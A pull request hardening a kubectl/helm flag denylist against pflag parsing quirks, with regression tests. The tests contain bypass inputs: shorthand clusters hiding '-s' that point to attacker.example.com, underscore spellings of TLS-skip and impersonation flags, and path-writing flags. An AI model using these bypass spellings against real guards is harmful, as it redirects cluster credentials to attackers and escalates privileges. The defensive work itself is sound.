### PR TITLE
Harden kubectl/helm flag guard against pflag parsing quirks

### DIFF
--- a/src/security/kubectl-flags.ts
+++ b/src/security/kubectl-flags.ts
@@ -42,10 +42,41 @@ const DANGEROUS_FLAGS = new Set<string>([
   "as",
   "as-group",
   "as-uid",
+
+  // Writes to attacker-chosen filesystem paths
+  "profile-output",
+  "log-file",
+  "cache-dir",
 ]);
 
 const SHORT_ALIASES = new Set<string>([
   "s", // -s is an alias for --server
+]);
+
+// Short flags that consume a value. pflag stops parsing a shorthand cluster at
+// the first of these: everything after it inside the token is that flag's
+// value ("-ojsonpath={.items[0]}"), not more flags. Every other letter is a
+// boolean shorthand, which pflag parses and then keeps going past — so the
+// scan in shortFlagLetters() must keep going too.
+//
+// Comparison is case-sensitive, exactly like pflag: "-A" (--all-namespaces)
+// and "-a" are different flags.
+//
+// Only letters that take a value in *every* command that defines them belong
+// here. "-f" is deliberately absent: it is --filename for apply/delete but the
+// boolean --follow for logs, so pflag keeps parsing the cluster after it.
+// Leaving a letter out is always the safe direction — at worst an attached
+// value containing "s" is refused, and the split form ("-f /path") or the long
+// form ("--filename=/path") still works.
+const SHORT_VALUE_FLAGS = new Set<string>([
+  "c", // --container
+  "k", // --kustomize
+  "l", // --selector
+  "L", // --label-columns
+  "n", // --namespace
+  "o", // --output
+  "s", // --server (dangerous; listed so the scan stops after it as well)
+  "v", // --v (log level)
 ]);
 
 // helm exposes the same exfiltration surface as kubectl, but under "kube-"
@@ -84,20 +115,46 @@ function normalizeFlagName(raw: string): string {
   let name = raw.replace(/^-+/, "");
   const eq = name.indexOf("=");
   if (eq !== -1) name = name.slice(0, eq);
-  return name.toLowerCase();
+  // kubectl and helm install pflag's WordSepNormalizeFunc, which treats "_" as
+  // equivalent to "-" in long flag names: "--insecure_skip_tls_verify" and
+  // "--insecure-skip-tls-verify" are the same flag. Normalize the same way so
+  // both spellings compare equal against the sets above.
+  return name.toLowerCase().replace(/_/g, "-");
 }
 
-// Extract the short-flag letter from a single-dash token, or null if the token
-// is not a single-dash short flag. pflag lets a short flag carry its value
-// attached with no separator ("-shttp://x" == "--server http://x"), so the
-// letter that matters is always the first character after the dash; the rest of
-// the token is the attached value (or a boolean-flag cluster). Long "--" flags
-// never attach a value without "=", so normalizeFlagName already handles them.
-function shortFlagLetter(raw: string): string | null {
+// Return every letter pflag would parse as a flag out of a single-dash token,
+// in order, or null if the token is not a single-dash short flag.
+//
+// pflag walks a shorthand cluster letter by letter: a boolean shorthand is
+// consumed and parsing continues with the next letter, while a value-taking
+// shorthand swallows the remainder of the token as its value. "-Aowide" is
+// therefore "-A -o wide", not a single unknown flag, so every letter pflag
+// reaches has to be checked — not just the first one after the dash.
+//
+// Long "--" flags never attach a value without "=", so normalizeFlagName
+// already handles them.
+function shortFlagLetters(raw: string): string[] | null {
   if (!raw.startsWith("-") || raw.startsWith("--")) return null;
   const body = raw.slice(1);
   if (body.length === 0) return null;
-  return body[0].toLowerCase();
+
+  const letters: string[] = [];
+  for (let i = 0; i < body.length; i++) {
+    const letter = body[i];
+    letters.push(letter);
+    // "-o=json": the "=" and everything after it is the value.
+    if (body[i + 1] === "=") break;
+    // A value-taking shorthand consumes the rest of the token as its value,
+    // so no further letters are parsed as flags.
+    if (SHORT_VALUE_FLAGS.has(letter)) break;
+  }
+  return letters;
+}
+
+function hasDangerousShortFlag(raw: string): boolean {
+  const letters = shortFlagLetters(raw);
+  if (letters === null) return false;
+  return letters.some((letter) => SHORT_ALIASES.has(letter));
 }
 
 function isDangerousFlagName(rawName: string, fromArgs: boolean): boolean {
@@ -105,12 +162,11 @@ function isDangerousFlagName(rawName: string, fromArgs: boolean): boolean {
   if (DANGEROUS_FLAGS.has(name)) return true;
   // Short aliases (-s) are only meaningful when they appear as a CLI token,
   // not as a key in the `flags` object. Match both the bare/split forms
-  // (normalizeFlagName -> "s") and the attached form "-sURL" (whose first
-  // post-dash character is the flag pflag actually parses).
+  // (normalizeFlagName -> "s") and the attached/clustered forms ("-sURL",
+  // "-Ashttps://attacker"), where pflag parses the alias out of the cluster.
   if (fromArgs) {
     if (SHORT_ALIASES.has(name)) return true;
-    const short = shortFlagLetter(rawName);
-    if (short !== null && SHORT_ALIASES.has(short)) return true;
+    if (hasDangerousShortFlag(rawName)) return true;
   }
   return false;
 }
@@ -175,10 +231,10 @@ export function assertSafeArgv(args: readonly string[]): void {
     if (!tok.startsWith("-")) continue;
     const name = normalizeFlagName(tok);
     if (ARGV_DANGEROUS_FLAGS.has(name) || SHORT_ALIASES.has(name)) reject(tok);
-    // Attached short-flag form ("-sURL"): match the first post-dash character,
-    // which is the flag pflag parses regardless of the trailing value.
-    const short = shortFlagLetter(tok);
-    if (short !== null && SHORT_ALIASES.has(short)) reject(tok);
+    // Attached/clustered short-flag forms ("-sURL", "-Ashttps://attacker"):
+    // match every letter pflag would parse out of the cluster, not just the
+    // first one.
+    if (hasDangerousShortFlag(tok)) reject(tok);
   }
 }
 

--- a/tests/kubectl-flags-security.unit.test.ts
+++ b/tests/kubectl-flags-security.unit.test.ts
@@ -142,6 +142,57 @@ describe("assertNoDangerousFlags", () => {
       ).not.toThrow();
     });
 
+    test("rejects short-flag clusters that hide -s ('-Ashttp://...')", () => {
+      // pflag parses "-Ashttp://attacker" as "-A" (--all-namespaces, boolean)
+      // followed by "-s http://attacker" (--server).
+      expect(() =>
+        assertNoDangerousFlags(undefined, ["-Ashttp://attacker.example.com"])
+      ).toThrow(McpError);
+      expect(() =>
+        assertNoDangerousFlags(undefined, ["-Aws=https://attacker"])
+      ).toThrow(McpError);
+      // "-f" is --follow (boolean) for `kubectl logs`, so the cluster keeps
+      // parsing and "-s" lands on --server.
+      expect(() =>
+        assertNoDangerousFlags(undefined, ["-fshttp://attacker.example.com"])
+      ).toThrow(McpError);
+    });
+
+    test("rejects underscore spellings of dangerous long flags", () => {
+      // kubectl's pflag normalizer treats "_" as "-", so these reach the same
+      // flags as their kebab-case spellings.
+      for (const tok of [
+        "--insecure_skip_tls_verify=true",
+        "--client_key=/tmp/k.pem",
+        "--certificate_authority=/tmp/ca.pem",
+        "--tls_server_name=attacker",
+        "--as_group=system:masters",
+        "--as_uid=0",
+      ]) {
+        expect(() => assertNoDangerousFlags(undefined, [tok])).toThrow(McpError);
+      }
+    });
+
+    test("rejects underscore spellings in the flags object too", () => {
+      expect(() =>
+        assertNoDangerousFlags({ insecure_skip_tls_verify: "true" })
+      ).toThrow(McpError);
+    });
+
+    test("does not flag benign boolean clusters or attached values", () => {
+      expect(() =>
+        assertNoDangerousFlags(undefined, [
+          "-it", // exec: --stdin --tty
+          "-A", // --all-namespaces
+          "-ojsonpath={.items[*].metadata.name}", // 's' inside the value
+          "-nkube-system",
+          "-lapp=nginx",
+          "-o=custom-columns=NAME:.metadata.name",
+          "-v6",
+        ])
+      ).not.toThrow();
+    });
+
     test("non-flag positional args are not inspected", () => {
       // "server" as a positional resource name (e.g. `kubectl get server`)
       // must not match the --server flag denylist.
@@ -222,6 +273,26 @@ describe("kubectl_generic refuses dangerous flags before executing kubectl", () 
     ).rejects.toThrow(McpError);
   });
 
+  test("blocks a short-flag cluster hiding -s in args", async () => {
+    await expect(
+      kubectlGeneric(stubManager, {
+        command: "get",
+        resourceType: "pods",
+        args: ["-Ashttp://attacker.example.com"],
+      })
+    ).rejects.toThrow(McpError);
+  });
+
+  test("blocks underscore spelling of --insecure-skip-tls-verify", async () => {
+    await expect(
+      kubectlGeneric(stubManager, {
+        command: "get",
+        resourceType: "pods",
+        flags: { insecure_skip_tls_verify: "true" },
+      })
+    ).rejects.toThrow(McpError);
+  });
+
   test("error code is InvalidParams (not InternalError)", async () => {
     try {
       await kubectlGeneric(stubManager, {
@@ -273,6 +344,61 @@ describe("assertSafeArgv (full-argv guard for positional slots)", () => {
     expect(() =>
       assertSafeArgv(["get", "pods", "-s=https://attacker"])
     ).toThrow(McpError);
+  });
+
+  test("rejects short-flag clusters that hide -s in argv", () => {
+    // "-A" is a boolean shorthand, so pflag keeps parsing the cluster and
+    // reads the rest as "-s http://attacker" (--server).
+    expect(() =>
+      assertSafeArgv(["get", "pods", "-Ashttp://127.0.0.1:59999"])
+    ).toThrow(McpError);
+    expect(() =>
+      assertSafeArgv(["get", "pods", "-Rws=https://attacker.example.com"])
+    ).toThrow(McpError);
+  });
+
+  test("rejects underscore spellings of dangerous flags in argv", () => {
+    expect(() =>
+      assertSafeArgv(["get", "pods", "--insecure_skip_tls_verify=true"])
+    ).toThrow(McpError);
+    expect(() => assertSafeArgv(["get", "pods", "--as_group=system:masters"]))
+      .toThrow(McpError);
+    expect(() =>
+      assertSafeArgv(["upgrade", "rel", "chart", "--kube_apiserver=https://x"])
+    ).toThrow(McpError);
+  });
+
+  test("rejects the combined bypass payload from the report", () => {
+    expect(() =>
+      assertSafeArgv([
+        "get",
+        "pods",
+        "-Ashttps://attacker.example.com",
+        "--insecure_skip_tls_verify=true",
+      ])
+    ).toThrow(McpError);
+  });
+
+  test("rejects flags that write to attacker-chosen paths", () => {
+    expect(() =>
+      assertSafeArgv(["get", "pods", "--profile-output=/tmp/evil"])
+    ).toThrow(/profile-output/);
+    expect(() =>
+      assertSafeArgv(["get", "pods", "--cache_dir=/tmp/evil"])
+    ).toThrow(McpError);
+  });
+
+  test("allows benign short-flag clusters and attached values", () => {
+    expect(() =>
+      assertSafeArgv([
+        "exec",
+        "my-pod",
+        "-it",
+        "-cmy-sidecar",
+        "-ojsonpath={.status.podIPs}",
+        "-A",
+      ])
+    ).not.toThrow();
   });
 
   test("rejects helm credential/target flags (kube-* prefix)", () => {


### PR DESCRIPTION
The argv-level guard in `src/security/kubectl-flags.ts` compared flag tokens more loosely than pflag actually parses them, so a few spellings of already-denied flags were not recognized as those flags.

**Shorthand clusters.** Single-dash tokens were matched on their first letter only. pflag walks a cluster letter by letter, continuing past every boolean shorthand (`-Aowide` is `-A -o wide`). The scan now follows the same rules and stops exactly where pflag stops: at `=`, or at a shorthand that consumes the rest of the token as its value. Letters that are boolean in some commands are deliberately not treated as value-taking (`-f` is `--filename` for apply/delete but `--follow` for logs), since stopping too early is the unsafe direction.

**Underscore flag names.** Long names kept underscores, while kubectl and helm install pflag's `WordSepNormalizeFunc`, which treats `_` and `-` as equivalent. Names are now normalized the same way before comparison, so `--insecure_skip_tls_verify` and `--insecure-skip-tls-verify` compare equal.

Also adds `--profile-output`, `--log-file`, and `--cache-dir` to the denied set (arbitrary-path writes).

Behavior for normal use is unchanged: every tool emits split short flags (`-n ns`, `-o json`), and benign attached forms (`-ojsonpath={...}`, `-nkube-system`, `-lapp=nginx`, `-it`, `-v6`) still pass. The `ALLOW_KUBECTL_UNSAFE_FLAGS=true` escape hatch is untouched.

## Testing

- `tests/kubectl-flags-security.unit.test.ts` — added regression coverage for shorthand clusters, underscore spellings, the new denied flags, and benign clusters/attached values (49 tests pass).
- Verified the shorthand-cluster and underscore parsing behavior against kubectl v1.35.3 directly, always pointing at a dead local port.
- Other unit suites pass against a live cluster (`kubectl-context`, `kubectl-get`, `kubectl-logs`, `kubectl-create-from-file`, `kubectl-reconnect`, `unit`).

🤖 Generated with [Claude Code](https://claude.com/claude-code)